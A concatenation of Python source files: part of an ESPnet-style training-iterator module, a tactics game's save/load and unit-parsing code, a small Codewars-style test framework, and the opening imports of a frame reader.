num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
if len(shape_files) == 0:
key_file = data_path_and_name_and_type[0][0]
else:
key_file = shape_files[0]
batch_sampler = UnsortedBatchSampler(batch_size=1, key_file=key_file)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
logging.info(f"[{name}] dataset:\n{dataset}")
if distributed:
world_size = torch.distributed.get_world_size()
rank = torch.distributed.get_rank()
if len(batches) < world_size:
raise RuntimeError("Number of samples is smaller than world_size")
if batch_size < world_size:
raise RuntimeError("batch_size must be equal or more than world_size")
if rank < batch_size % world_size:
batch_size = batch_size // world_size + 1
else:
batch_size = batch_size // world_size
num_cache_chunks = num_cache_chunks // world_size
# NOTE(kamo): Split whole corpus by sample numbers without considering
# each of the lengths, therefore the number of iteration counts are not
# always equal to each other and the iterations are limitted
# by the fewest iterations.
# i.e. the samples over the counts are discarded.
batches = batches[rank::world_size]
return ChunkIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
# For chunk iterator,
# --num_iters_per_epoch doesn't indicate the number of iterations,
# but indicates the number of samples.
num_samples_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
batch_size=batch_size,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
@classmethod
def build_multiple_iter_factroy(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
train: bool,
num_iters_per_epoch: Optional[int],
max_cache_size: float,
seed: int,
**kwargs,
):
assert check_argument_types()
assert len(data_path_and_name_and_type) > 0, len(data_path_and_name_and_type)
# 1. Sanity check
num_splits = None
for path in [path for path, _, _ in data_path_and_name_and_type] + list(
shape_files
):
if not Path(path).is_dir():
raise RuntimeError(f"{path} is not a directory")
p = Path(path) / "num_splits"
if not p.exists():
raise FileNotFoundError(f"{p} is not found")
with p.open() as f:
_num_splits = int(f.read())
if num_splits is not None and num_splits != _num_splits:
raise RuntimeError(
f"Number of splits are mismathed: "
f"{data_path_and_name_and_type[0][0]} and {path}"
)
num_splits = _num_splits
for i in range(num_splits):
p = Path(path) / f"split.{i}"
if not p.exists():
raise FileNotFoundError(f"{p} is not found")
# 2. Create functions to build an iter factory for each splits
data_path_and_name_and_type_list = [
[
(str(Path(p) / f"split.{i}"), n, t)
for p, n, t in data_path_and_name_and_type
]
for i in range(num_splits)
]
shape_files_list = [
[str(Path(s) / f"split.{i}") for s in shape_files]
for i in range(num_splits)
]
num_iters_per_epoch_list = [
(num_iters_per_epoch + i) // num_splits
if num_iters_per_epoch is not None
else None
for i in range(num_splits)
]
max_cache_size = max_cache_size / num_splits
# Note that iter-factories are built for each epoch at runtime lazily.
build_funcs = [
functools.partial(
cls.build_iter_factory,
data_path_and_name_and_type=_data_path_and_name_and_type,
shape_files=_shape_files,
num_iters_per_epoch=_num_iters_per_epoch,
max_cache_size=max_cache_size,
seed=seed,
train=train,
**kwargs,
)
for (
_data_path_and_name_and_type,
_shape_files,
_num_iters_per_epoch,
) in zip(
data_path_and_name_and_type_list,
shape_files_list,
num_iters_per_epoch_list,
)
]
# 3. Build MultipleIterFactory
return MultipleIterFactory(build_funcs=build_funcs, shuffle=train, seed=seed,)
@classmethod
def build_streaming_iterator(
cls,
data_path_and_name_and_type,
preprocess_fn,
collate_fn,
key_file: str = None,
batch_size: int = 1,
dtype: str = np.float32,
num_workers: int = 1,
allow_variable_data_keys: bool = False,
ngpu: int = 0,
inference: bool = False,
) -> DataLoader:
"""Build DataLoader using iterable dataset"""
assert check_argument_types()
# For backward compatibility for pytorch DataLoader
if collate_fn is not None:
kwargs = dict(collate_fn=collate_fn)
else:
kwargs = {}
# IterableDataset is supported from pytorch=1.2
if LooseVersion(torch.__version__) >= LooseVersion("1.2"):
dataset = IterableESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
key_file=key_file,
)
kwargs.update(batch_size=batch_size)
else:
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
)
if key_file is None:
key_file = data_path_and_name_and_type[0][0]
batch_sampler = UnsortedBatchSampler(
batch_size=batch_size, key_file=key_file, drop_last=False,
)
kwargs.update(batch_sampler=batch_sampler)
cls.check_task_requirements(dataset, allow_variable_data_keys, inference)
return DataLoader(
dataset=dataset, pin_memory=ngpu > 0, num_workers=num_workers, **kwargs,
)
# ~~~~~~~~~ The methods below are mainly used for inference ~~~~~~~~~
@classmethod
def build_model_from_file(
cls,
config_file: Union[Path, str],
model_file: Union[Path, str] = None,
device: str = "cpu",
) -> Tuple[AbsESPnetModel, argparse.Namespace]:
"""This method is used for inference or fine-tuning.
Args:
config_file: The yaml file saved when training.
model_file: The model file saved when training.
device:
"""
assert check_argument_types()
config_file = Path(config_file)
with config_file.open("r", encoding="utf-8") as f:
args = yaml.safe_load(f)
args = argparse.Namespace(**args)
model = cls.build_model(args)
if not isinstance(model, AbsESPnetModel):
raise RuntimeError(
f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
)
model.to(device)
if model_file is not None:
if device == "cuda":
# NOTE(kamo): "cuda" for torch.load always indicates cuda:0
# in PyTorch<=1.4
device = f"cuda:{torch.cuda.current_device()}"
model.load_state_dict(torch.load(model_file, map_location=device))
return model, args
|
SaveLoad.py | # Saving and Loading Functions
# === IMPORT MODULES =============================================
import random, copy, threading, shutil
import cPickle as pickle
from collections import OrderedDict
# Custom imports
import GlobalConstants as GC
import configuration as cf
import TileObject, ItemMethods, UnitObject, StatusObject, CustomObjects, Utility
from UnitObject import Stat
import logging
logger = logging.getLogger(__name__)
# === READS LEVEL FILE (BITMAP MODE) ==============================================================================
def load_level(levelfolder, gameStateObj, metaDataObj):
# Done at the beginning of a new level and ONLY then
GC.U_ID = 100
# Assorted Files
unitfilename = levelfolder + '/UnitLevel.txt'
unitFile = open(unitfilename, 'r')
unitcontent = unitFile.readlines()
unitFile.close()
# For gameStateObj
reinforceUnits, prefabs = {}, {}
# Read overview file
overview_filename = levelfolder + '/overview.txt'
overview_dict = read_overview_file(overview_filename)
# Get objective
starting_objective = CustomObjects.Objective(overview_dict['display_name'], overview_dict['win_condition'], overview_dict['loss_condition'])
# MetaDataObj holds unchanging information for the level
# And general abstraction information
get_metaDataObj(levelfolder, metaDataObj)
# Get tiles
currentMap = create_map(levelfolder, overview_dict)
gameStateObj.start_map(currentMap)
# === Process unit data ===
current_mode = '0123456789' # Defaults to all modes
for line in unitcontent:
# Process each line that was in the level file.
line = line.strip()
# Skip empty or comment lines
if not line or line.startswith('#'):
continue
# Process line
unitLine = line.split(';')
current_mode = parse_unit_line(unitLine, current_mode, gameStateObj.allunits, gameStateObj.groups, reinforceUnits, prefabs, metaDataObj, gameStateObj)
gameStateObj.start(allreinforcements=reinforceUnits, prefabs=prefabs, objective=starting_objective)
def create_map(levelfolder, overview_dict=None):
if not overview_dict:
overview_filename = levelfolder + '/overview.txt'
overview_dict = read_overview_file(overview_filename)
tilefilename = levelfolder + '/TileData.png'
mapfilename = levelfolder + '/MapSprite.png'
weather = overview_dict['weather'].split(',') if 'weather' in overview_dict else []
currentMap = TileObject.MapObject(mapfilename, tilefilename, levelfolder, weather)
return currentMap
def get_metaDataObj(levelfolder, metaDataObj, changes=None):
if not changes:
changes = []
overview_filename = levelfolder + '/overview.txt'
prebaseScript_filename = levelfolder + '/prebaseScript.txt'
narrationScript_filename = levelfolder + '/narrationScript.txt'
introScript_filename = levelfolder + '/introScript.txt'
outroScript_filename = levelfolder + '/outroScript.txt'
death_quote_filename = 'Data/death_quote_info.txt'
portrait_dict = create_portrait_dict()
# Grab general catalogs
class_dict = create_class_dict()
lore_dict = create_lore_dict()
overview_dict = read_overview_file(overview_filename)
metaDataObj['name'] = overview_dict['name']
metaDataObj['preparationFlag'] = bool(int(overview_dict['prep_flag']))
metaDataObj['prep_music'] = overview_dict['prep_music'] if int(overview_dict['prep_flag']) else None
metaDataObj['pickFlag'] = bool(int(overview_dict['pick_flag']))
metaDataObj['baseFlag'] = overview_dict['base_flag'] if overview_dict['base_flag'] != '0' else False
metaDataObj['base_music'] = overview_dict['base_music'] if overview_dict['base_flag'] != '0' else None
metaDataObj['marketFlag'] = bool(int(overview_dict['market_flag']))
metaDataObj['transitionFlag'] = bool(int(overview_dict['transition_flag']))
metaDataObj['playerPhaseMusic'] = GC.MUSICDICT[overview_dict['player_phase_music']]
metaDataObj['enemyPhaseMusic'] = GC.MUSICDICT[overview_dict['enemy_phase_music']]
metaDataObj['otherPhaseMusic'] = GC.MUSICDICT[overview_dict['other_phase_music']] if 'other_phase_music' in overview_dict else None
metaDataObj['prebaseScript'] = prebaseScript_filename
metaDataObj['narrationScript'] = narrationScript_filename
metaDataObj['introScript'] = introScript_filename
metaDataObj['outroScript'] = outroScript_filename
metaDataObj['overview'] = overview_filename
metaDataObj['death_quotes'] = death_quote_filename
metaDataObj['class_dict'] = class_dict
metaDataObj['portrait_dict'] = portrait_dict
metaDataObj['lore'] = lore_dict
for line in changes:
if line[1].endswith('Music'):
line[2] = GC.MUSICDICT[line[2]]
metaDataObj[line[1]] = line[2]
def read_overview_file(overview_filename):
overview_lines = {}
with open(overview_filename, 'r') as mainInfo:
for line in mainInfo:
split_line = line.rstrip('\r\n').split(";", 1)
overview_lines[split_line[0]] = split_line[1]
return overview_lines
def parse_unit_line(unitLine, current_mode, allunits, groups, reinforceUnits, prefabs, metaDataObj, gameStateObj):
logger.info('Reading unit line %s', unitLine)
# New Group
if unitLine[0] == 'group':
groups[unitLine[1]] = (unitLine[2], unitLine[3], unitLine[4])
elif unitLine[0] == 'mode':
current_mode = unitLine[1]
elif unitLine[0] == 'load_player_characters':
for unit in allunits:
if unit.team == 'player' and not unit.dead:
reinforceUnits[unit.name] = (unit.id, None)
elif str(gameStateObj.mode['difficulty']) in current_mode:
# New Unit
if unitLine[1] == "0":
if len(unitLine) > 7:
create_unit(unitLine, allunits, groups, reinforceUnits, metaDataObj, gameStateObj)
else:
add_unit(unitLine, allunits, reinforceUnits, metaDataObj, gameStateObj)
# Saved Unit
elif unitLine[1] == "1":
for unit in allunits:
if unit.name == unitLine[3]: # Saved units use their name...\
if unitLine[4] == 'None':
position = None
else:
position = tuple([int(num) for num in unitLine[4].split(',')])
if unitLine[2] == "0": # Unit starts on board
unit.position = position
else: # Unit does not start on board
reinforceUnits[unitLine[2]] = (unit.id, position)
# Created Unit
elif unitLine[1] == "2":
event_id = unitLine[2]
prefabs[event_id] = unitLine
else:
pass
# Unit is not used in this mode
return current_mode
def default_previous_classes(cur_class, classes, class_dict):
while class_dict[cur_class]['tier'] > len(classes) and class_dict[cur_class]['promotes_from']:
prev_class = class_dict[cur_class]['promotes_from']
if prev_class not in classes:
classes.insert(0, prev_class)
cur_class = prev_class
def add_unit(unitLine, allunits, reinforceUnits, metaDataObj, gameStateObj):
assert len(unitLine) == 6, "unitLine %s must have length 6"%(unitLine)
legend = {'team': unitLine[0], 'unit_type': unitLine[1], 'event_id': unitLine[2],
'unit_id': unitLine[3], 'position': unitLine[4], 'ai': unitLine[5]}
class_dict = metaDataObj['class_dict']
for unit in GC.UNITDATA.getroot().findall('unit'):
if unit.find('id').text == legend['unit_id']:
u_i = {}
u_i['u_id'] = unit.find('id').text
u_i['event_id'] = legend['event_id']
u_i['position'] = tuple([int(num) for num in legend['position'].split(',')]) if ',' in legend['position'] else None
u_i['name'] = unit.get('name')
u_i['team'] = legend['team']
classes = unit.find('class').text.split(',')
u_i['klass'] = classes[-1]
# Give default previous class
default_previous_classes(u_i['klass'], classes, class_dict)
u_i['gender'] = int(unit.find('gender').text)
u_i['level'] = int(unit.find('level').text)
u_i['faction'] = unit.find('faction').text
stats = intify_comma_list(unit.find('bases').text)
for n in xrange(len(stats), cf.CONSTANTS['num_stats']):
stats.append(class_dict[u_i['klass']]['bases'][n])
if u_i['team'] == 'player': # Modify stats
bases = gameStateObj.modify_stats['player_bases']
growths = gameStateObj.modify_stats['player_growths']
else:
bases = gameStateObj.modify_stats['enemy_bases']
growths = gameStateObj.modify_stats['enemy_growths']
stats = [sum(x) for x in zip(stats, bases)]
assert len(stats) == cf.CONSTANTS['num_stats'], "bases %s must be exactly %s integers long"%(stats, cf.CONSTANTS['num_stats'])
u_i['stats'] = build_stat_dict(stats)
logger.debug("%s's stats: %s", u_i['name'], u_i['stats'])
u_i['growths'] = intify_comma_list(unit.find('growths').text)
u_i['growths'].extend([0] * (cf.CONSTANTS['num_stats'] - len(u_i['growths'])))
u_i['growths'] = [sum(x) for x in zip(u_i['growths'], growths)]
assert len(u_i['growths']) == cf.CONSTANTS['num_stats'], "growths %s must be exactly %s integers long"%(stats, cf.CONSTANTS['num_stats'])
u_i['growth_points'] = [50]*cf.CONSTANTS['num_stats']
u_i['items'] = ItemMethods.itemparser(unit.find('inventory').text)
# Parse wexp
u_i['wexp'] = unit.find('wexp').text.split(',')
for index, wexp in enumerate(u_i['wexp'][:]):
if wexp in CustomObjects.WEAPON_EXP.wexp_dict:
u_i['wexp'][index] = CustomObjects.WEAPON_EXP.wexp_dict[wexp]
u_i['wexp'] = [int(num) for num in u_i['wexp']]
assert len(u_i['wexp']) == len(CustomObjects.WEAPON_TRIANGLE.types), "%s's wexp must have as many slots as there are weapon types."%(u_i['name'])
u_i['desc'] = unit.find('desc').text
# Tags
class_tags = class_dict[u_i['klass']]['tags']
personal_tags = set(unit.find('tags').text.split(',')) if unit.find('tags') is not None and unit.find('tags').text is not None else set()
u_i['tags'] = class_tags | personal_tags
u_i['ai'] = legend['ai']
u_i['movement_group'] = class_dict[u_i['klass']]['movement_group']
cur_unit = UnitObject.UnitObject(u_i)
if u_i['event_id'] != "0": # unit does not start on board
cur_unit.position = None
reinforceUnits[u_i['event_id']] = (u_i['u_id'], u_i['position'])
else: # Unit does start on board
cur_unit.position = u_i['position']
# Status Effects and Skills
get_skills(class_dict, cur_unit, classes, u_i['level'], gameStateObj, feat=False)
# Personal Skills
personal_skills = unit.find('skills').text.split(',') if unit.find('skills') is not None and unit.find('skills').text is not None else []
c_s = [StatusObject.statusparser(status) for status in personal_skills]
for status in c_s:
if status:
StatusObject.HandleStatusAddition(status, cur_unit, gameStateObj)
# handle having a status that gives stats['HP']
cur_unit.set_hp(int(cur_unit.stats['HP']))
allunits.append(cur_unit)
break
return allunits, reinforceUnits
def create_unit(unitLine, allunits, groups, reinforceUnits, metaDataObj, gameStateObj):
assert len(unitLine) in [9, 10], "unitLine %s must have length 9 or 10 (if optional status)"%(unitLine)
legend = {'team': unitLine[0], 'unit_type': unitLine[1], 'event_id': unitLine[2],
'class': unitLine[3], 'level': unitLine[4], 'items': unitLine[5],
'position': unitLine[6], 'ai': unitLine[7], 'group': unitLine[8]}
class_dict = metaDataObj['class_dict']
u_i = {}
GC.U_ID += 1
u_i['u_id'] = GC.U_ID
u_i['team'] = legend['team']
u_i['event_id'] = legend['event_id']
if legend['class'].endswith('F'):
legend['class'] = legend['class'][:-1] # strip off the F
u_i['gender'] = 5 # Default female gender is 5
else:
u_i['gender'] = 0 # Default male gender is 0
classes = legend['class'].split(',')
u_i['klass'] = classes[-1]
# Give default previous class
default_previous_classes(u_i['klass'], classes, class_dict)
u_i['level'] = int(legend['level'])
u_i['position'] = tuple([int(num) for num in legend['position'].split(',')])
u_i['name'], u_i['faction'], u_i['desc'] = groups[legend['group']]
stats, u_i['growths'], u_i['growth_points'], u_i['items'], u_i['wexp'] = get_unit_info(class_dict, u_i['klass'], u_i['level'], legend['items'], gameStateObj)
u_i['stats'] = build_stat_dict(stats)
logger.debug("%s's stats: %s", u_i['name'], u_i['stats'])
u_i['tags'] = class_dict[u_i['klass']]['tags']
u_i['ai'] = legend['ai']
u_i['movement_group'] = class_dict[u_i['klass']]['movement_group']
cur_unit = UnitObject.UnitObject(u_i)
# Reposition units
if u_i['event_id'] != "0": # Unit does not start on board
cur_unit.position = None
reinforceUnits[u_i['event_id']] = (cur_unit.id, u_i['position'])
else: # Unit does start on board
cur_unit.position = u_i['position']
# Status Effects and Skills
get_skills(class_dict, cur_unit, classes, u_i['level'], gameStateObj, feat=False)
# Extra Skills
if len(unitLine) == 10:
statuses = [StatusObject.statusparser(status) for status in unitLine[9].split(',')]
for status in statuses:
StatusObject.HandleStatusAddition(status, cur_unit, gameStateObj)
allunits.append(cur_unit)
return cur_unit
def create_summon(summon_info, summoner, position, metaDataObj, gameStateObj):
# Important Info
class_dict = metaDataObj['class_dict']
u_i = {}
GC.U_ID += 1
u_i['u_id'] = GC.U_ID
classes = summon_info.klass.split(',')
u_i['level'] = summoner.level
u_i['position'] = position
u_i['team'] = summoner.team
u_i['event_id'] = 0
u_i['gender'] = 0
classes = classes[:summoner.level/cf.CONSTANTS['max_level'] + 1]
u_i['klass'] = classes[-1]
u_i['faction'] = summoner.faction
u_i['name'] = summon_info.name
u_i['desc'] = summon_info.desc
u_i['ai'] = summon_info.ai
u_i['tags'] = set(class_dict[u_i['klass']]['tags'].split(',')) if class_dict[u_i['klass']]['tags'] else set()
u_i['tags'].add('Summon_' + str(summon_info.s_id) + '_' + str(summoner.id)) # Add unique identifier
u_i['movement_group'] = class_dict[u_i['klass']]['movement_group']
stats, u_i['growths'], u_i['growth_points'], u_i['items'], u_i['wexp'] = get_unit_info(class_dict, u_i['klass'], u_i['level'], summon_info.item_line, gameStateObj)
u_i['stats'] = build_stat_dict(stats)
unit = UnitObject.UnitObject(u_i)
# Status Effects and Skills
my_seed = sum(u_i['position']) if u_i['position'] else 0
get_skills(class_dict, unit, classes, u_i['level'], gameStateObj, seed=my_seed)
return unit
def build_stat_dict(stats):
st = OrderedDict()
for idx, name in enumerate(cf.CONSTANTS['stat_names']):
st[name] = Stat(idx, stats[idx])
return st
def build_stat_dict_plus(stats):
st = OrderedDict()
for idx, name in enumerate(cf.CONSTANTS['stat_names']):
st[name] = Stat(idx, stats[idx][0], stats[idx][1])
return st
def get_unit_info(class_dict, klass, level, item_line, gameStateObj):
# Handle stats
# hp, str, mag, skl, spd, lck, def, res, con, mov
bases = class_dict[klass]['bases'][:] # Using copies
growths = class_dict[klass]['growths'][:] # Using copies
bases = [sum(x) for x in zip(bases, gameStateObj.modify_stats['enemy_bases'])]
growths = [sum(x) for x in zip(growths, gameStateObj.modify_stats['enemy_growths'])]
stats, growth_points = auto_level(bases, growths, level, class_dict[klass]['max'], gameStateObj)
# Make sure we don't exceed max
stats = [Utility.clamp(stat, 0, class_dict[klass]['max'][index]) for index, stat in enumerate(stats)]
# Handle items
items = ItemMethods.itemparser(item_line)
# Handle required wexp
wexp = class_dict[klass]['wexp_gain'][:]
# print(klass, wexp)
for item in items:
if item.weapon:
weapon_types = item.TYPE
item_level = item.weapon.LVL
elif item.spell:
weapon_types = item.TYPE
item_level = item.spell.LVL
else:
continue
for weapon_type in weapon_types:
wexp_index = CustomObjects.WEAPON_TRIANGLE.type_to_index[weapon_type]
item_requirement = CustomObjects.WEAPON_EXP.wexp_dict[item_level]
# print(item, weapon_type, wexp_index, item_requirement, wexp[wexp_index])
if item_requirement > wexp[wexp_index] and wexp[wexp_index] > 0:
wexp[wexp_index] = item_requirement
# print(wexp)
return stats, growths, growth_points, items, wexp
def get_skills(class_dict, unit, classes, level, gameStateObj, feat=True, seed=0):
class_skills = []
for index, klass in enumerate(classes):
for level_needed, class_skill in class_dict[klass]['skills']:
# If level is gte level needed for skill or gte max_level
if level%cf.CONSTANTS['max_level'] >= level_needed or index < len(classes) - 1 or level%cf.CONSTANTS['max_level'] == 0:
class_skills.append(class_skill)
# === Handle Feats (Naive choice)
if feat:
for status in class_skills:
if status == 'Feat':
counter = 0
while StatusObject.feat_list[(seed + counter)%len(StatusObject.feat_list)] in class_skills:
counter += 1
class_skills.append(StatusObject.feat_list[(seed + counter)%len(StatusObject.feat_list)])
class_skills = [status for status in class_skills if status != 'Feat']
logger.debug('Class Skills %s', class_skills)
# === Actually add statuses
status_effects = [StatusObject.statusparser(status) for status in class_skills]
for status in status_effects:
if status:
StatusObject.HandleStatusAddition(status, unit, gameStateObj)
# handle having a status that gives stats['HP']
unit.set_hp(int(unit.stats['HP']))
def auto_level(bases, growths, level, max_stats, gameStateObj):
stats = bases[:]
growth_points = [50 for growth in growths]
leveling = cf.CONSTANTS['enemy_leveling']
if leveling == 3:
leveling = gameStateObj.mode['growths']
if leveling == 1 or leveling == 3: # Fixed -- 3 if not chosen
for index, growth in enumerate(growths):
growth_sum = growth * (level - 1)
stats[index] += growth_sum/100
growth_points[index] += growth_sum%100
elif leveling == 0: # Random
for index, growth in enumerate(growths):
for _ in range(level - 1):
growth_rate = growth
while growth_rate > 0:
stats[index] += 1 if random.randint(0, 99) < growth_rate else 0
growth_rate -= 100
elif leveling == 2: # Like Radiant Dawn Bonus Exp Method -- Hybrid
growths = [growth * (level - 1) if stats[index] < max_stats[index] else 0 for index, growth in enumerate(growths)]
growth_sum = sum(growths)
num_choice = growth_sum/100
growth_points[0] = growth_sum%100
while num_choice > 0:
num_choice -= 1
idx = Utility.weighted_choice(growths)
stats[idx] += 1
growths[idx] = max(0, growths[idx] - 100)
if stats[idx] >= max_stats[idx]:
num_choice -= growths[idx]/100
growths[idx] = 0
else:
logger.error('Unsupported leveling type %s', leveling)
return stats, growth_points
"""
def place_mount(mount_id, chosen_unit, reinforceUnits):
my_mount = None
for u_id, (unit, position) in reinforceUnits.iteritems():
if mount_id == u_id:
my_mount = unit
break
if my_mount:
chosen_unit.mount(my_mount, None)
logger.warning('Could not find mount!')
"""
def intify_comma_list(comma_string):
# Takes string, turns it into list of ints
if comma_string:
s_l = comma_string.split(',')
s_l = [int(num) for num in s_l]
else:
s_l = []
return s_l
# === PARSES A SKILL LINE =====================================================
def class_skill_parser(skill_text):
if skill_text is not None:
each_skill = skill_text.split(';')
split_line = [(int(skill.split(',')[0]), skill.split(',')[1]) for skill in each_skill]
return split_line
else:
return []
# === CREATE CLASS DICTIONARY ================================================
def create_class_dict():
class_dict = OrderedDict()
# For each class
for klass in GC.CLASSDATA.getroot().findall('class'):
c_id = klass.get('id')
class_dict[c_id] = {'name': klass.find('name').text,
'id': klass.get('id'),
'tier': int(klass.find('tier').text),
'wexp_gain': intify_comma_list(klass.find('wexp_gain').text),
'promotes_from': klass.find('promotes_from').text if klass.find('promotes_from').text is not None else None,
'turns_into': klass.find('turns_into').text.split(',') if klass.find('turns_into').text is not None else [],
'movement_group': int(klass.find('movement_group').text),
'tags': set(klass.find('tags').text.split(',')) if klass.find('tags').text is not None else set(),
'skills': class_skill_parser(klass.find('skills').text),
'growths': intify_comma_list(klass.find('growths').text),
'bases': intify_comma_list(klass.find('bases').text),
'promotion': intify_comma_list(klass.find('promotion').text) if klass.find('promotion') is not None else [0]*10,
'max': intify_comma_list(klass.find('max').text) if klass.find('max') is not None else [60],
'desc': klass.find('desc').text}
class_dict[c_id]['bases'].extend([0] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['bases'])))
class_dict[c_id]['growths'].extend([0] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['growths'])))
class_dict[c_id]['promotion'].extend([0] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['promotion'])))
class_dict[c_id]['max'].extend([cf.CONSTANTS['max_stat']] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['max'])))
return class_dict
# === CREATE LORE DICTIONARY =================================================
def create_lore_dict():
lore_dict = {}
# For each lore
for entry in GC.LOREDATA.getroot().findall('lore'):
lore_dict[entry.get('name')] = {'long_name': entry.find('long_name').text,
'short_name': entry.get('name'),
'desc': entry.find('desc').text,
'type': entry.find('type').text,
'unread': True}
return lore_dict
# === CREATE PORTRAIT_DICTIONARY =============================================
def create_portrait_dict():
portrait_dict = OrderedDict()
for portrait in GC.PORTRAITDATA.getroot().findall('portrait'):
portrait_dict[portrait.get('name')] = {'mouth': [int(coord) for coord in portrait.find('mouth').text.split(',')],
'blink': [int(coord) for coord in portrait.find('blink').text.split(',')]}
return portrait_dict
# Save IO
def save_io(to_save, to_save_meta, old_slot, slot=None, hard_loc=None):
if hard_loc:
save_loc = 'Saves/' + hard_loc + '.p'
meta_loc = 'Saves/' + hard_loc + '.pmeta'
else:
save_loc = 'Saves/SaveState' + str(slot) + '.p'
meta_loc = 'Saves/SaveState' + str(slot) + '.pmeta'
logger.info('Saving to %s', save_loc)
with open(save_loc, 'wb') as suspendFile:
pickle.dump(to_save, suspendFile)
with open(meta_loc, 'wb') as metaFile:
pickle.dump(to_save_meta, metaFile)
# For restart
if not hard_loc: # Hard loc is used for suspend, which doesn't need a restart
r_save = 'Saves/Restart' + str(slot) + '.p'
r_save_meta = 'Saves/Restart' + str(slot) + '.pmeta'
if old_slot == 'Start':
if save_loc != r_save:
shutil.copy(save_loc, r_save)
shutil.copy(meta_loc, r_save_meta)
else:
if 'Saves/Restart' + str(old_slot) + '.p' != r_save:
shutil.copy('Saves/Restart' + str(old_slot) + '.p', r_save)
shutil.copy('Saves/Restart' + str(old_slot) + '.pmeta', r_save_meta)
"""
# Take the temporary file we just created and make it an actual file
# This is so if the saving fails, we do not lose the old savedata
if os.path.isfile(save_loc):
os.remove(save_loc)
os.rename(save_loc + 'tmp', save_loc) # Put it in permanently
"""
# === SAVE FUNCTION ==========================================================
def suspendGame(gameStateObj, kind, slot=None, hard_loc=None):
old_slot = gameStateObj.save_slot
if kind == 'Start':
gameStateObj.sweep() # This cleans_up, since we're done with level.
old_slot = 'Start'
gameStateObj.save_slot = slot
# gameStateObj.removeSprites()
to_save, to_save_meta = gameStateObj.save()
to_save_meta['kind'] = kind
to_save_meta['name'] = read_overview_file('Data/Level' + str(gameStateObj.counters['level']) + '/overview.txt')['name']
gameStateObj.saving_thread = threading.Thread(target=save_io, args=(copy.deepcopy(to_save), copy.deepcopy(to_save_meta), old_slot, slot, hard_loc))
gameStateObj.saving_thread.start()
# gameStateObj.loadSprites()
# === LOAD FUNCTION ===========================================================
"""returns gameStateObj from a suspend"""
def loadGame(gameStateObj, metaDataObj, saveSlot):
to_save = saveSlot.loadGame()
# Rebuild gameStateObj
gameStateObj.load(to_save)
gameStateObj.save_slot = saveSlot.number
levelfolder = 'Data/Level' + str(gameStateObj.counters['level'])
get_metaDataObj(levelfolder, metaDataObj, gameStateObj.metaDataObj_changes)
gameStateObj.loadSprites()
if any(isinstance(unit.id, int) for unit in gameStateObj.allunits):
GC.U_ID = max(unit.id for unit in gameStateObj.allunits if isinstance(unit.id, int))
else:
GC.U_ID = 100
|
test_framework.py | from __future__ import print_function
class AssertException(Exception):
pass
def format_message(message):
return message.replace("\n", "<:LF:>")
def display(type, message, label="", mode=""):
print("\n<{0}:{1}:{2}>{3}".format(
type.upper(), mode.upper(), label, format_message(message))
, flush=True)
def expect(passed=None, message=None, allow_raise=False):
if passed:
display('PASSED', 'Test Passed')
else:
message = message or "Value is not what was expected"
display('FAILED', message)
if allow_raise:
raise AssertException(message)
def assert_equals(actual, expected, message=None, allow_raise=False):
equals_msg = "{0} should equal {1}".format(repr(actual), repr(expected))
if message is None:
message = equals_msg
else:
message += ": " + equals_msg
expect(actual == expected, message, allow_raise)
def assert_not_equals(actual, expected, message=None, allow_raise=False):
r_actual, r_expected = repr(actual), repr(expected)
equals_msg = "{0} should not equal {1}".format(r_actual, r_expected)
if message is None:
message = equals_msg
else:
message += ": " + equals_msg
expect(not (actual == expected), message, allow_raise)
def expect_error(message, function, exception=Exception):
passed = False
try:
function()
except exception:
passed = True
except Exception as e:
message = "{}: {} should be {}".format(message or "Unexpected exception", repr(e), repr(exception))
expect(passed, message)
def expect_no_error(message, function, exception=BaseException):
try:
function()
except exception as e:
fail("{}: {}".format(message or "Unexpected exception", repr(e)))
return
except:
pass
pass_()
def pass_(): expect(True)
def fail(message): expect(False, message)
def assert_approx_equals(
actual, expected, margin=1e-9, message=None, allow_raise=False):
msg = "{0} should be close to {1} with absolute or relative margin of {2}"
equals_msg = msg.format(repr(actual), repr(expected), repr(margin))
if message is None:
message = equals_msg
else:
message += ": " + equals_msg
div = max(abs(actual), abs(expected), 1)
expect(abs((actual - expected) / div) < margin, message, allow_raise)
'''
Usage:
@describe('describe text')
def describe1():
@it('it text')
def it1():
# some test cases...
'''
def _timed_block_factory(opening_text):
from timeit import default_timer as timer
from traceback import format_exception
from sys import exc_info
def _timed_block_decorator(s, before=None, after=None):
display(opening_text, s)
def wrapper(func):
if callable(before):
before()
time = timer()
try:
func()
except AssertionError as e:
display('FAILED', str(e))
except Exception:
fail('Unexpected exception raised')
tb_str = ''.join(format_exception(*exc_info()))
display('ERROR', tb_str)
display('COMPLETEDIN', '{:.2f}'.format((timer() - time) * 1000))
if callable(after):
after()
return wrapper
return _timed_block_decorator
describe = _timed_block_factory('DESCRIBE')
it = _timed_block_factory('IT')
'''
Timeout utility
Usage:
@timeout(sec)
def some_tests():
any code block...
Note: Timeout value can be a float.
'''
def timeout(sec):
def wrapper(func):
from multiprocessing import Process
msg = 'Should not throw any exceptions inside timeout'
def wrapped():
expect_no_error(msg, func)
process = Process(target=wrapped)
process.start()
process.join(sec)
if process.is_alive():
fail('Exceeded time limit of {:.3f} seconds'.format(sec))
process.terminate()
process.join()
return wrapper
|
framereader.py | import os
import sys
import glob
import json
import time
import struct
import tempfile
import threading
import xml.etree.ElementTree as ET
import numpy as np
if sys.version_info >= (3,0):
import queue
import pickle
